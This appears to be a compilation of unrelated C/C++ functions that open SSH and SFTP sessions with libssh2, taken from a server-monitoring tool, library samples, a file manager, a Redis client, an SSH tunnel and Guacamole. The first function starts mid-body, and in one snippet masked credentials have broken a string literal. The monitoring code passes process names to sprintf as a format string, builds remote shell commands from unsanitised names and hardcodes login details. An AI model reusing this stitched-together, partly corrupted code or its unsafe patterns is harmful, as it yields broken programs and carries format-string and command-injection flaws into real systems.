g_cSystemLogger.LogMessage("(%s:%s:%d)::Sequence Length %d ipadress %s,and psl %s cancelOrderId %d value of i %d \n", LOG_LOCATION, sample->ip_info._length,sample->ip_info[i].ipadress,sample->ip_info[i].psl,sample->ip_info[i].CancelOrderId,i); sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = inet_addr(sample->ip_info[i].ipadress); if (connect(sock, (struct sockaddr*) (&sin), sizeof (struct sockaddr_in)) != 0) { g_cSystemLogger.LogMessage("(%s:%s(:%d)::failure establishing ssh", LOG_LOCATION); return -1; } session = libssh2_session_init(); if (libssh2_session_handshake(session, sock)) { g_cSystemLogger.LogMessage("(%s:%s(:%d):: failure ssh session initiation", LOG_LOCATION); } /* if((strcmp(sample->ip_info[i].ipadress,"192.168.30.32")==0)|| (strcmp(sample->ip_info[i].psl,"192.168.30.231")==0)) { userName = "******"; passWord = "******"; } else*/ userName = "******"; passWord = "******"; lpUserAuthList = libssh2_userauth_list(session, userName, strlen(userName)); if (NULL == lpUserAuthList) { g_cSystemLogger.LogMessage("(%s:%s(:%d):: get user auth list failed", LOG_LOCATION); } char lcPreferredAuthMethod[20] = "password"; g_cSystemLogger.LogMessage("(%s:%s(:%d)::authentication methods(%s)", LOG_LOCATION, lpUserAuthList); if (strstr(lpUserAuthList, lcPreferredAuthMethod) != NULL) { auth_pw |= 1; g_cSystemLogger.LogMessage("(%s:%s(:%d)::authentication methods(%d)", LOG_LOCATION, auth_pw); } if (auth_pw & 1) { if (libssh2_userauth_password(session, userName, passWord)) { g_cSystemLogger.LogMessage("(%s:%s(:%d)::Authentation by password failed\n", LOG_LOCATION); } else { g_cSystemLogger.LogMessage("(%s:%s(:%d)::Authentation by mint succesded\n", LOG_LOCATION); } } while ((channel2 = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session, NULL, NULL, 0) == LIBSSH2_ERROR_EAGAIN) { waitsocket(sock, session); } if (channel2 == NULL) { g_cSystemLogger.LogMessage("(%s:%s(:%d))ssh channel opening fail", LOG_LOCATION); } if(strcmp(sample->ip_info[i].psl,"Process")==0) { g_cSystemLogger.LogMessage("(%s:%s(:%d)) Inside Process", LOG_LOCATION); for(serIter=conn->getServerInfo().begin();serIter!=conn->getServerInfo().end();serIter++) { g_cSystemLogger.LogMessage("(%s:%s(:%d)) ipadress from iter %s", LOG_LOCATION,serIter->ipAdress); tagServerInfo &tagServ = *serIter; g_cSystemLogger.LogMessage("(%s:%s(:%d)) ipadress from tagserver %s sampeip %s \n", LOG_LOCATION,tagServ.ipAdress,sample->ip_info[i].ipadress); if(strcmp(tagServ.ipAdress,sample->ip_info[i].ipadress)==0) { int pos=0; g_cSystemLogger.LogMessage("(%s:%s(:%d)) tagServ %s sample %s processLen %d \n", LOG_LOCATION,tagServ.ipAdress,sample->ip_info[i].ipadress,tagServ.noOfProcess); for(int j=1;j<tagServ.noOfProcess;j++) { g_cSystemLogger.LogMessage("(%s:%s(:%d)) Process %s \n", LOG_LOCATION,tagServ.processes[j].name); if(j==(tagServ.noOfProcess-1)) { sprintf(processes+pos,tagServ.processes[j].name); } else { pos+=sprintf(processes+pos,"%s%s",tagServ.processes[j].name,"|"); } } sprintf(command,"%s %s%s%s%s %s%s%s%s","ps -ef | egrep -v ","\"", "egrep|vi|tail|cat|emacs|more|nohup","\"" ,"| egrep","\"",processes,"\"","| grep -v daemon"); g_cSystemLogger.LogMessage("(%s:%s(:%d)) command %s", LOG_LOCATION,command); while ((rc = libssh2_channel_exec(channel2, command)) == LIBSSH2_ERROR_EAGAIN) { waitsocket(sock, session); } lnReturnCode = libssh2_channel_read(channel2, command, sizeof (command)); g_cSystemLogger.LogMessage("(%s:%s(:%d)) lnReturnCode %d command %s", LOG_LOCATION,lnReturnCode,command); strncpy(ld.processInfo,command,sizeof(command)); memset(command, 0, sizeof (command)); libssh2_channel_free(channel2); channel2 = NULL; } } } else if((strcmp(sample->ip_info[i].psl,"Space"))==0) { while ((rc = libssh2_channel_exec(channel2, "df -kh |grep -v grep")) == LIBSSH2_ERROR_EAGAIN) { waitsocket(sock, session); } lnReturnCode = libssh2_channel_read(channel2, command, sizeof (command)); g_cSystemLogger.LogMessage("(%s:%s(:%d)lnReturnCode %d command after executing %s\n", LOG_LOCATION, lnReturnCode, command); strcpy(ld.spaceInfo,command); memset(command, 0, sizeof (command)); libssh2_channel_free(channel2); channel2 = NULL; } else if((strcmp(sample->ip_info[i].psl,"Line"))==0) { DBConnection lDBConnectionObject; char* dbUserName = "******"; char* dbPassWord = "******"; char* dbName = "mani"; char* dbPort = "5432"; if(0==lDBConnectionObject.getFoPiQueryResult(dbUserName,dbPassWord,dbName,dbPort,sample->ip_info[i].ipadress,ld)) { g_cSystemLogger.LogMessage("(%s:%s(:%d) Failed DB query \n", LOG_LOCATION); } g_cSystemLogger.LogMessage("(%s:%s(:%d) LineId %d Product details %s line count %d\n", LOG_LOCATION,ld.ld[0].fo_id,ld.ld[0].product_details,ld.line_count); lDBConnectionObject.Close(); } iterMap = conn->getPath().find(sample->ip_info[i].ipadress); g_cSystemLogger.LogMessage("(%s:%s(:%d))Path %s \n", LOG_LOCATION,iterMap->second.c_str()); if (sample->ip_info[i].status == true) { sprintf(command, "%s%s",iterMap->second.c_str(),"/clear_server.sh >> /tmp/LOGS/cronlog 2>&1 &"); while ((rc = libssh2_channel_exec(channel2, command)) == LIBSSH2_ERROR_EAGAIN) { waitsocket(sock, session); } lnReturnCode = libssh2_channel_read(channel2, command, sizeof (command)); g_cSystemLogger.LogMessage("(%s:%s(:%d)lnReturnCode %d command after executing %s\n", LOG_LOCATION, lnReturnCode, command); memset(command, 0, sizeof (command)); libssh2_channel_free(channel2); channel2 = NULL; } else if((sample->ip_info[i].status==false) && ((strcmp(sample->ip_info[i].psl,""))==0) && (sample->ip_info[i].CancelOrderId==0)) { sprintf(command, "%s", "cd /home/mint/ga/bin; nohup ./shutdownall.sh >> /tmp/LOGS/cronlog1 2>&1 &"); g_cSystemLogger.LogMessage("(%s:%s(:%d)%s\n", LOG_LOCATION, command); while ((rc = libssh2_channel_exec(channel2, command)) == LIBSSH2_ERROR_EAGAIN) { g_cSystemLogger.LogMessage("(%s:%s(:%d) ERROR Running command %d\n", LOG_LOCATION, rc); waitsocket(sock, session); } size_t lnReturnCode; lnReturnCode = libssh2_channel_read(channel2, command, sizeof (command)); g_cSystemLogger.LogMessage("(%s:%s(:%d)lnReturnCode %d commandBuffer %s\n", LOG_LOCATION, lnReturnCode, command); memset(command, 0, sizeof (command)); libssh2_channel_free(channel2); channel2 = NULL; } g_cSystemLogger.LogMessage("(%s:%s(:%d)space %s\n", LOG_LOCATION,ld.spaceInfo); CcopyStructure::copyCommandData(ld, ld.line_count); } } return true; }
int main(int argc, char *argv[]) { unsigned long hostaddr; int sock = -1, i, rc; struct sockaddr_in sin; const char *fingerprint; char *userauthlist; LIBSSH2_SESSION *session = NULL; LIBSSH2_CHANNEL *channel; LIBSSH2_AGENT *agent = NULL; struct libssh2_agent_publickey *identity, *prev_identity = NULL; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(2,0), &wsadata); #endif if (argc > 1) { hostaddr = inet_addr(argv[1]); } else { hostaddr = htonl(0x7F000001); } if(argc > 2) { username = argv[2]; } rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } /* Ultra basic "connect to port 22 on localhost". Your code is * responsible for creating the socket establishing the connection */ sock = socket(AF_INET, SOCK_STREAM, 0); if (sock == -1) { fprintf(stderr, "failed to create socket!\n"); rc = 1; goto shutdown; } sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = hostaddr; if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); goto shutdown; } /* Create a session instance and start it up. This will trade welcome * banners, exchange keys, and setup crypto, compression, and MAC layers */ session = libssh2_session_init(); if (libssh2_session_handshake(session, sock)) { fprintf(stderr, "Failure establishing SSH session\n"); return 1; } /* At this point we havn't authenticated. The first thing to do is check * the hostkey's fingerprint against our known hosts Your app may have it * hard coded, may go to a file, may present it to the user, that's your * call */ fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); fprintf(stderr, "Fingerprint: "); for(i = 0; i < 20; i++) { fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]); } fprintf(stderr, "\n"); /* check what authentication methods are available */ userauthlist = libssh2_userauth_list(session, username, strlen(username)); fprintf(stderr, "Authentication methods: %s\n", userauthlist); if (strstr(userauthlist, "publickey") == NULL) { fprintf(stderr, "\"publickey\" authentication is not supported\n"); goto shutdown; } /* Connect to the ssh-agent */ agent = libssh2_agent_init(session); if (!agent) { fprintf(stderr, "Failure initializing ssh-agent support\n"); rc = 1; goto shutdown; } if (libssh2_agent_connect(agent)) { fprintf(stderr, "Failure connecting to ssh-agent\n"); rc = 1; goto shutdown; } if (libssh2_agent_list_identities(agent)) { fprintf(stderr, "Failure requesting identities to ssh-agent\n"); rc = 1; goto shutdown; } while (1) { rc = libssh2_agent_get_identity(agent, &identity, prev_identity); if (rc == 1) break; if (rc < 0) { fprintf(stderr, "Failure obtaining identity from ssh-agent support\n"); rc = 1; goto shutdown; } if (libssh2_agent_userauth(agent, username, identity)) { fprintf(stderr, "\tAuthentication with username %s and " "public key %s failed!\n", username, identity->comment); } else { fprintf(stderr, "\tAuthentication with username %s and " "public key %s succeeded!\n", username, identity->comment); break; } prev_identity = identity; } if (rc) { fprintf(stderr, "Couldn't continue authentication\n"); goto shutdown; } /* We're authenticated now. */ /* Request a shell */ if (!(channel = libssh2_channel_open_session(session))) { fprintf(stderr, "Unable to open a session\n"); goto shutdown; } /* Some environment variables may be set, * It's up to the server which ones it'll allow though */ libssh2_channel_setenv(channel, "FOO", "bar"); /* Request a terminal with 'vanilla' terminal emulation * See /etc/termcap for more options */ if (libssh2_channel_request_pty(channel, "vanilla")) { fprintf(stderr, "Failed requesting pty\n"); goto skip_shell; } /* Open a SHELL on that pty */ if (libssh2_channel_shell(channel)) { fprintf(stderr, "Unable to request shell on allocated pty\n"); goto shutdown; } /* At this point the shell can be interacted with using * libssh2_channel_read() * libssh2_channel_read_stderr() * libssh2_channel_write() * libssh2_channel_write_stderr() * * Blocking mode may be (en|dis)abled with: libssh2_channel_set_blocking() * If the server send EOF, libssh2_channel_eof() will return non-0 * To send EOF to the server use: libssh2_channel_send_eof() * A channel can be closed with: libssh2_channel_close() * A channel can be freed with: libssh2_channel_free() */ skip_shell: if (channel) { libssh2_channel_free(channel); channel = NULL; } /* Other channel types are supported via: * libssh2_scp_send() * libssh2_scp_recv() * libssh2_channel_direct_tcpip() */ shutdown: libssh2_agent_disconnect(agent); libssh2_agent_free(agent); if(session) { libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); } if (sock != -1) { #ifdef WIN32 closesocket(sock); #else close(sock); #endif } fprintf(stderr, "all done!\n"); libssh2_exit(); return rc; }
int main(int argc, char *argv[]) { unsigned long hostaddr; int sock, i, auth_pw = 1; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; const char *username="******"; const char *password="******"; const char *loclfile="sftp_write_nonblock.c"; const char *sftppath="/tmp/sftp_write_nonblock.c"; int rc; FILE *local; LIBSSH2_SFTP *sftp_session; LIBSSH2_SFTP_HANDLE *sftp_handle; char mem[1024 * 1000]; size_t nread; size_t memuse; time_t start; long total = 0; int duration; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(2,0), &wsadata); #endif if (argc > 1) { hostaddr = inet_addr(argv[1]); } else { hostaddr = htonl(0x7F000001); } if (argc > 2) { username = argv[2]; } if (argc > 3) { password = argv[3]; } if (argc > 4) { loclfile = argv[4]; } if (argc > 5) { sftppath = argv[5]; } rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } local = fopen(loclfile, "rb"); if (!local) { printf("Can't local file %s\n", loclfile); return -1; } /* * The application code is responsible for creating the socket * and establishing the connection */ sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = hostaddr; if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); return -1; } /* Create a session instance */ session = libssh2_session_init(); if (!session) return -1; /* Since we have set non-blocking, tell libssh2 we are non-blocking */ libssh2_session_set_blocking(session, 0); /* ... start it up. This will trade welcome banners, exchange keys, * and setup crypto, compression, and MAC layers */ while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "Failure establishing SSH session: %d\n", rc); return -1; } /* At this point we havn't yet authenticated. The first thing to do is * check the hostkey's fingerprint against our known hosts Your app may * have it hard coded, may go to a file, may present it to the user, * that's your call */ fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); printf("Fingerprint: "); for(i = 0; i < 20; i++) { printf("%02X ", (unsigned char)fingerprint[i]); } printf("\n"); if (auth_pw) { /* We could authenticate via password */ while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { printf("Authentication by password failed.\n"); goto shutdown; } } else { /* Or by public key */ while ((rc = libssh2_userauth_publickey_fromfile(session, username, "/home/username/.ssh/id_rsa.pub", "/home/username/.ssh/id_rsa", password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { printf("\tAuthentication by public key failed\n"); goto shutdown; } } fprintf(stderr, "libssh2_sftp_init()!\n"); do { sftp_session = libssh2_sftp_init(session); if (!sftp_session && (libssh2_session_last_errno(session) != LIBSSH2_ERROR_EAGAIN)) { fprintf(stderr, "Unable to init SFTP session\n"); goto shutdown; } } while (!sftp_session); fprintf(stderr, "libssh2_sftp_open()!\n"); /* Request a file via SFTP */ do { sftp_handle = libssh2_sftp_open(sftp_session, sftppath, LIBSSH2_FXF_WRITE|LIBSSH2_FXF_CREAT|LIBSSH2_FXF_TRUNC, LIBSSH2_SFTP_S_IRUSR|LIBSSH2_SFTP_S_IWUSR| LIBSSH2_SFTP_S_IRGRP|LIBSSH2_SFTP_S_IROTH); if (!sftp_handle && (libssh2_session_last_errno(session) != LIBSSH2_ERROR_EAGAIN)) { fprintf(stderr, "Unable to open file with SFTP\n"); goto shutdown; } } while (!sftp_handle); fprintf(stderr, "libssh2_sftp_open() is done, now send data!\n"); start = time(NULL); memuse = 0; /* it starts blank */ do { nread = fread(&mem[memuse], 1, sizeof(mem)-memuse, local); if (nread <= 0) { /* end of file */ if (memuse > 0) /* the previous sending is not finished */ nread = 0; else break; } memuse += nread; total += nread; /* write data in a loop until we block */ while ((rc = libssh2_sftp_write(sftp_handle, mem, memuse)) == LIBSSH2_ERROR_EAGAIN) { waitsocket(sock, session); } if(rc < 0) break; if(memuse - rc) { /* make room for more data at the end of the buffer */ memmove(&mem[0], &mem[rc], memuse - rc); memuse -= rc; } else /* 'mem' was consumed fully */ memuse = 0; } while (rc > 0); duration = (int)(time(NULL)-start); printf("%ld bytes in %d seconds makes %.1f bytes/sec\n", total, duration, total/(double)duration); fclose(local); libssh2_sftp_close(sftp_handle); libssh2_sftp_shutdown(sftp_session); shutdown: while (libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing") == LIBSSH2_ERROR_EAGAIN); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif printf("all done\n"); libssh2_exit(); return 0; }
/* sftp协议连接 */ static int sftp_connect(protocol_data_t *protocol, char *host, int port, char *username, char *password) { int rc; struct sockaddr_in sin; if (protocol == NULL || protocol->protocol_data == NULL || host == NULL || username == NULL || password == NULL) { return; } sftp_data_t *data = (sftp_data_t *)protocol->protocol_data; data->sock = socket(AF_INET, SOCK_STREAM, 0); if (data->sock == -1) { return -1; } sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.s_addr = inet_addr(host); rc = unblock_connect(data->sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)); if (rc != 0) { close(data->sock); return -1; } data->session = libssh2_session_init(); if(!data->session) { close(data->sock); return -1; } rc = libssh2_session_handshake(data->session, data->sock); if(rc) { close(data->sock); return -1; } rc = libssh2_userauth_password(data->session, username, password); if (rc) { goto shutdown; } data->sftp_session = libssh2_sftp_init(data->session); if (!data->sftp_session) { goto shutdown; } libssh2_session_set_blocking(data->session, 1); /* TODO: 赋值 */ return 0; shutdown: libssh2_session_disconnect(data->session, "Normal Shutdown"); libssh2_session_free(data->session); close(data->sock); return -1; }
int FSSftp::CheckSession( int* err, FSCInfo* info ) { if ( sshSession ) { return 0; } try { unsigned ip; int e; if ( !GetHostIp( unicode_to_utf8( _operParam.server.Data() ).data(), &ip, &e ) ) { throw int( e ); } _sock.Create(); _sock.Connect( ntohl( ip ), _operParam.port ); sshSession = libssh2_session_init(); if ( !sshSession ) { throw int( SSH_INTERROR_X3 ); } libssh2_session_set_blocking( sshSession, 0 ); WHILE_EAGAIN_( e, libssh2_session_handshake( sshSession, _sock.Id() ) ); if ( e ) { throw int( e - 1000 ); } FSString userName = ""; if ( _operParam.user.Data()[0] ) { userName = _operParam.user.Data(); } else { #ifndef _WIN32 char* ret = getenv( "LOGNAME" ); if ( ret ) { userName = FSString( sys_charset_id, ret ); _operParam.user = userName.GetUnicode(); MutexLock infoLock( &infoMutex ); _infoParam.user = userName.GetUnicode(); } #endif }; char* authList = 0; char* charUserName = ( char* )userName.Get( _operParam.charset ); while ( true ) { authList = libssh2_userauth_list( sshSession, charUserName, strlen( charUserName ) ); if ( authList ) { break; } CheckSessionEagain(); WaitSocket( info ); } //publickey,password,keyboard-interactive static const char passId[] = "password"; static const char kInterId[] = "keyboard-interactive"; static unicode_t userSymbol = '@'; while ( true ) { if ( !strncmp( authList, passId, strlen( passId ) ) ) { FSPromptData data; data.visible = false; data.prompt = utf8_to_unicode( "Password:"******"SFTP_" ).data(), carray_cat<unicode_t>( userName.GetUnicode(), &userSymbol, _operParam.server.Data() ).data(), &data, 1 ) ) { throw int( SSH_INTERROR_STOPPED ); } int ret; WHILE_EAGAIN_( ret, libssh2_userauth_password( sshSession, ( char* )FSString( _operParam.user.Data() ).Get( _operParam.charset ), ( char* )FSString( data.prompt.Data() ).Get( _operParam.charset ) ) ); if ( ret ) { throw int( ret - 1000 ); } break; //!!! } else if ( !strncmp( authList, kInterId, strlen( kInterId ) ) ) { MutexLock lock( &kbdIntMutex ); kbdIntInfo = info; kbdIntParam = &_operParam; int ret; WHILE_EAGAIN_( ret, libssh2_userauth_keyboard_interactive( sshSession, ( char* )FSString( _operParam.user.Data() ).Get( _operParam.charset ), KbIntCallback ) ); if ( ret ) { throw int( ret - 1000 ); } break; //!!! } char* s = authList; while ( *s && *s != ',' ) { s++; } if ( !*s ) { break; } authList = s + 1; }; while ( true ) { sftpSession = libssh2_sftp_init( sshSession ); if ( sftpSession ) { break; } if ( !sftpSession ) { int e = libssh2_session_last_errno( sshSession ); if ( e != LIBSSH2_ERROR_EAGAIN ) { throw int( e - 1000 ); } } WaitSocket( info ); } return 0; } catch ( int e ) { if ( err ) { *err = e; } //if (sftpSession) ??? похоже закрытие сессии все решает if ( sshSession ) { libssh2_session_free( sshSession ); } sshSession = 0; sftpSession = 0; _sock.Close( false ); return ( e == -2 ) ? -2 : -1; } }
redisContext *redisConnect(const char *ip, int port, const char *ssh_address, int ssh_port, const char *username, const char *password, const char *public_key, const char *private_key, const char *passphrase, int curMethod) { LIBSSH2_SESSION *session = NULL; if(ssh_address && curMethod != SSH_UNKNOWN){ int rc = libssh2_init(0); if (rc != 0) { return NULL; } struct sockaddr_in sin; /* Connect to SSH server */ int sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); sin.sin_family = AF_INET; if (INADDR_NONE == (sin.sin_addr.s_addr = inet_addr(ssh_address))) { return NULL; } sin.sin_port = htons(ssh_port); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return NULL; } /* Create a session instance */ session = libssh2_session_init(); if(!session) { return NULL; } /* ... start it up. This will trade welcome banners, exchange keys, * and setup crypto, compression, and MAC layers */ rc = libssh2_session_handshake(session, sock); if(rc) { return NULL; } int auth_pw = 0; libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); char *userauthlist = libssh2_userauth_list(session, username, strlen(username)); if (strstr(userauthlist, "password") != NULL) { auth_pw |= 1; } if (strstr(userauthlist, "keyboard-interactive") != NULL) { auth_pw |= 2; } if (strstr(userauthlist, "publickey") != NULL) { auth_pw |= 4; } if (auth_pw & 1 && curMethod == SSH_PASSWORD) { /* We could authenticate via password */ if (libssh2_userauth_password(session, username, password)) { //"Authentication by password failed!"; return NULL; } } else if (auth_pw & 2) { /* Or via keyboard-interactive */ if (libssh2_userauth_keyboard_interactive(session, username, &kbd_callback) ) { //"Authentication by keyboard-interactive failed!"; return NULL; } } else if (auth_pw & 4 && curMethod == SSH_PUBLICKEY) { /* Or by public key */ if (libssh2_userauth_publickey_fromfile(session, username, public_key, private_key, passphrase)){ //"Authentication by public key failed!"; return NULL; } } else { //"No supported authentication methods found!"; return NULL; } } redisContext *c; c = redisContextInit(); if (c == NULL) return NULL; c->session = session; c->flags |= REDIS_BLOCK; redisContextConnectTcp(c,ip,port,NULL); return c; }
bool CSSHTunnelThread::Initialize() { int rc, auth = AUTH_NONE; const char *fingerprint; char *userauthlist; #ifdef WIN32 char sockopt; WSADATA wsadata; int err; err = WSAStartup(MAKEWORD(2, 0), &wsadata); if(err != 0) { wxLogInfo(wxT("WSAStartup failed with error: %d"), err); return false; } #else int sockopt; #endif wxArrayString arrTunnelHostIP; if (resolveDNS(m_tunnelhost.mb_str(), arrTunnelHostIP)) { rc = libssh2_init (0); if (rc != 0) { LogSSHTunnelErrors(wxString::Format(_("libssh2 initialization failed with error code %d"), rc), GetId()); return false; } /* Connect to SSH server */ m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); m_sin.sin_family = AF_INET; if (INADDR_NONE == (m_sin.sin_addr.s_addr = inet_addr(arrTunnelHostIP.Item(0).mb_str()))) { LogSSHTunnelErrors(wxString::Format(_("SSH error: Error in inet address with error code %d"), wxSysErrorCode()), GetId()); return false; } m_sin.sin_port = htons(m_tunnelPort); if (connect(m_sock, (struct sockaddr *)(&m_sin), sizeof(struct sockaddr_in)) != 0) { LogSSHTunnelErrors(wxString::Format(_("SSH error: Could not connect to socket with error code %d"), wxSysErrorCode()), GetId()); return false; } /* Create a session instance */ m_session = libssh2_session_init(); if (!m_session) { LogSSHTunnelErrors(_("SSH error: Could not initialize SSH session!"), GetId()); return false; } /* ... start it up. This will trade welcome banners, exchange keys, * and setup crypto, compression, and MAC layers */ rc = libssh2_session_handshake(m_session, m_sock); if (rc) { LogSSHTunnelErrors(wxString::Format(_("SSH error: Error when starting up SSH session with error code %d"), rc), GetId()); return false; } /* At this point we havn't yet authenticated. The first thing to do * is check the hostkey's fingerprint against our known hosts Your app * may have it hard coded, may go to a file, may present it to the * user, that's your call */ fingerprint = libssh2_hostkey_hash(m_session, LIBSSH2_HOSTKEY_HASH_SHA1); wxString newHostKey = wxEmptyString; for(int i = 0; i < 20; i++) { newHostKey += wxString::Format(wxT("%02X "), (unsigned char)fingerprint[i]); } // Check if the SSH Host Key is verified if(!IsHostKeyVerified(newHostKey)) { Cleanup(); return false; } /* check what authentication methods are available */ userauthlist = libssh2_userauth_list(m_session, m_username.mb_str(), strlen(m_username.mb_str())); if (strstr(userauthlist, "password")) auth |= AUTH_PASSWORD; if(strstr(userauthlist, "keyboard-interactive")) auth |= AUTH_KEYBOARD_INTERACTIVE; if (strstr(userauthlist, "publickey")) auth |= AUTH_PUBLICKEY; if ((auth & AUTH_PASSWORD) && (m_enAuthMethod == AUTH_PASSWORD)) auth = AUTH_PASSWORD; else if ((auth & AUTH_KEYBOARD_INTERACTIVE) && (m_enAuthMethod == AUTH_PASSWORD)) auth = AUTH_KEYBOARD_INTERACTIVE; if ((auth & AUTH_PUBLICKEY) && (m_enAuthMethod == AUTH_PUBLICKEY)) auth = AUTH_PUBLICKEY; if (auth & AUTH_PASSWORD) { rc = libssh2_userauth_password(m_session, m_username.mb_str(), m_password.mb_str()); if (rc) { LogSSHTunnelErrors(wxString::Format(_("SSH error: Authentication by password failed with error code %d"), rc), GetId()); Cleanup(); return false; } } else if (auth & AUTH_KEYBOARD_INTERACTIVE) { rc = libssh2_userauth_keyboard_interactive(m_session, m_username.mb_str(), &CSSHTunnelThread::keyboard_interactive); if (rc) { LogSSHTunnelErrors(wxString::Format(_("SSH error: Authentication by password failed with error code %d"), rc), GetId()); Cleanup(); return false; } } else if (auth & AUTH_PUBLICKEY) { #ifdef HAVE_GCRYPT rc = libssh2_userauth_publickey_fromfile(m_session, m_username.mb_str(), m_publickey.mb_str(), m_privatekey.mb_str(), m_password.mb_str()); #else rc = libssh2_userauth_publickey_fromfile(m_session, m_username.mb_str(), NULL, m_privatekey.mb_str(), m_password.mb_str()); #endif if (rc) { LogSSHTunnelErrors(wxString::Format(_("SSH error: Authentication by identity file failed with error code %d"), rc), GetId()); Cleanup(); return false; } } else { LogSSHTunnelErrors(_("SSH error: No supported authentication methods found!"), GetId()); Cleanup(); return false; } // Get the IP Address of local machine wxArrayString arrLocalIP; if(resolveDNS("localhost", arrLocalIP)) { m_listensock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); memset(&m_sin, 0 , sizeof(m_sin)); m_sin.sin_family = AF_INET; // Give port no to 0 so that bind will automatically select the available port. m_sin.sin_port = htons(0); if (INADDR_NONE == (m_sin.sin_addr.s_addr = inet_addr(arrLocalIP.Item(0).mb_str()))) { Cleanup(); return false; } sockopt = 1; setsockopt(m_listensock, SOL_SOCKET, SO_REUSEADDR, &sockopt, sizeof(sockopt)); m_sinlen = sizeof(m_sin); if (-1 == bind(m_listensock, (struct sockaddr *)&m_sin, m_sinlen)) { LogSSHTunnelErrors(wxString::Format(_("SSH error: bind failed with error code %d"), wxSysErrorCode()), GetId()); Cleanup(); return false; } if (getsockname(m_listensock, (struct sockaddr *)&m_sin, &m_sinlen) == -1) { LogSSHTunnelErrors(wxString::Format(_("SSH error: getsockname() failed with error code %d"), wxSysErrorCode()), GetId()); Cleanup(); return false; } if (-1 == listen(m_listensock, 2)) { LogSSHTunnelErrors(wxString::Format(_("SSH error: listen failed with error code %d"), wxSysErrorCode()), GetId()); Cleanup(); return false; } m_local_listenip = wxString(inet_ntoa(m_sin.sin_addr), wxConvLibc); m_local_listenport = ntohs(m_sin.sin_port); wxLogInfo(wxT("Waiting for TCP connection on %s:%d..."), m_local_listenip.c_str(), m_local_listenport); return true; } else { LogSSHTunnelErrors(_("SSH error: Unable to resolve localhost"), GetId()); } } else { LogSSHTunnelErrors(wxString::Format(_("SSH error: Unable to resolve host: %s"), m_tunnelhost.c_str()), GetId()); } return false; }
guac_common_ssh_session* guac_common_ssh_create_session(guac_client* client, const char* hostname, const char* port, guac_common_ssh_user* user) { int retval; int fd; struct addrinfo* addresses; struct addrinfo* current_address; char connected_address[1024]; char connected_port[64]; struct addrinfo hints = { .ai_family = AF_UNSPEC, .ai_socktype = SOCK_STREAM, .ai_protocol = IPPROTO_TCP }; /* Get socket */ fd = socket(AF_INET, SOCK_STREAM, 0); if (fd < 0) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR, "Unable to create socket: %s", strerror(errno)); return NULL; } /* Get addresses connection */ if ((retval = getaddrinfo(hostname, port, &hints, &addresses))) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR, "Error parsing given address or port: %s", gai_strerror(retval)); close(fd); return NULL; } /* Attempt connection to each address until success */ current_address = addresses; while (current_address != NULL) { /* Resolve hostname */ if ((retval = getnameinfo(current_address->ai_addr, current_address->ai_addrlen, connected_address, sizeof(connected_address), connected_port, sizeof(connected_port), NI_NUMERICHOST | NI_NUMERICSERV))) guac_client_log(client, GUAC_LOG_DEBUG, "Unable to resolve host: %s", gai_strerror(retval)); /* Connect */ if (connect(fd, current_address->ai_addr, current_address->ai_addrlen) == 0) { guac_client_log(client, GUAC_LOG_DEBUG, "Successfully connected to host %s, port %s", connected_address, connected_port); /* Done if successful connect */ break; } /* Otherwise log information regarding bind failure */ else guac_client_log(client, GUAC_LOG_DEBUG, "Unable to connect to " "host %s, port %s: %s", connected_address, connected_port, strerror(errno)); current_address = current_address->ai_next; } /* If unable to connect to anything, fail */ if (current_address == NULL) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR, "Unable to connect to any addresses."); close(fd); return NULL; } /* Free addrinfo */ freeaddrinfo(addresses); /* Allocate new session */ guac_common_ssh_session* common_session = malloc(sizeof(guac_common_ssh_session)); /* Open SSH session */ LIBSSH2_SESSION* session = libssh2_session_init_ex(NULL, NULL, NULL, common_session); if (session == NULL) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR, "Session allocation failed."); free(common_session); close(fd); return NULL; } /* Perform handshake */ if (libssh2_session_handshake(session, fd)) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR, "SSH handshake failed."); free(common_session); close(fd); return NULL; } /* Store basic session data */ common_session->client = client; common_session->user = user; common_session->session = session; common_session->fd = fd; /* Attempt authentication */ if (guac_common_ssh_authenticate(common_session)) { free(common_session); close(fd); return NULL; } /* Return created session */ return common_session; }